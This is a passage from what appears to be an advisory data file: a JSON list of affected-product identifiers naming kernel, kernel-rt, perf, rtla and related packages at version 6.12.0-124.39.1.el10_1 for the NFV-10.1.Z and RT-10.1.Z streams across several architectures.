"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
